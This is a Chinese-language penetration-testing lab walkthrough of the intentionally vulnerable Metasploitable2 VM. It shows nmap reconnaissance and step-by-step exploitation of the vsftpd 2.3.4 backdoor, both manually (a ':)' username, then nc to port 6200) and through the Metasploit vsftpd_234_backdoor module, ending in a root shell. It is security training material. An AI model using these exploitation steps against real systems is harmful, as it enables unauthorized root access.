关于Metasploitable2

这是Metasploitable2(Linux)

Metasploitable是一个故意易受攻击的Linux虚拟机。此VM可用于进行安全培训、测试安全工具和实践常见的渗透测试技术。

默认登录名和密码为msfadmin:msfadmin。

切勿将此VM暴露于不受信任的网络(如果您有任何疑问,请使用NAT或仅主机模式)。

要联系开发者,请发送电子邮件至msfdev@metasploit.com

有关详细信息,请参阅以下URL:

名称 Metasploitable2
发布日期 2012年6月13日
作者 rapid7user
系列 -
网页 https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

环境

靶机:Metasploitable2(IP:未知)

攻击机:KALI(IP:192.168.198.131)

平台:VMware 16.2.4

信息收集

主机发现

arp-scan -l

QQ截图20221002130319

使用 nmap 进行扫描主机

nmap -sS -Pn -A -p- -n 192.168.198.132

image-20221002131822557

image-20221002131900368

nmap -sV -p- 192.168.198.132

image-20221002132014254

收集到的信息:

  • IP => 192.168.198.132

  • 开放的端口:(真的是相当的多啊…)

    • PORT // STATE // SERVICE // VERSION

    • 21/tcp open ftp vsftpd 2.3.4

    • 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

    • 23/tcp open telnet Linux telnetd

    • 25/tcp open smtp Postfix smtpd

    • 53/tcp open domain ISC BIND 9.4.2

    • 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)

    • 111/tcp open rpcbind 2 (RPC #100000)

    • 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

    • 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

    • 512/tcp open exec netkit-rsh rexecd

    • 513/tcp open login OpenBSD or Solaris rlogind

    • 514/tcp open tcpwrapped

    • 1099/tcp open java-rmi GNU Classpath grmiregistry

    • 1524/tcp open bindshell Metasploitable root shell

    • 2049/tcp open nfs 2-4 (RPC #100003)

    • 2121/tcp open ftp ProFTPD 1.3.1

    • 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

    • 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

    • 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

    • 5900/tcp open vnc VNC (protocol 3.3)

    • 6000/tcp open X11 (access denied)

    • 6667/tcp open irc UnrealIRCd

    • 6697/tcp open irc UnrealIRCd

    • 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

    • 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

    • 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)

    • 37649/tcp open mountd 1-3 (RPC #100005)

    • 41732/tcp open java-rmi GNU Classpath grmiregistry

    • 42063/tcp open status 1 (RPC #100024)

    • 58117/tcp open nlockmgr 1-4 (RPC #100021)

渗透测试

21端口

我们可以看到在上方开放的端口中的21端口,版本号是“vsftpd 2.3.4”。对于这个版本,我们可以发现存在“笑脸漏洞后门”:

这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:)”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有“:)”,所以称笑脸漏洞。

开始尝试攻击:

ftp连接靶机:

ftp 192.168.198.132

image-20221002150006975

随便起一个用户名,再用户名中加上笑脸符号:),密码随意。然后需要稍等片刻。完成后再对靶机端口进行扫描,会发现开启了一个6200端口:

image-20221002150312694

使用nc对靶机进行连接:

nc 192.168.198.132 6200

image-20221002150744826

直接获得root权限。

我们再使用MSF框架来试验一遍:

执行 msfconsole

msf6 > search vsftpd

image-20221002144134861

使用模块:

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

设置靶机IP:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.198.132

运行:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

image-20221002144431744

获取root权限成功。

更新中…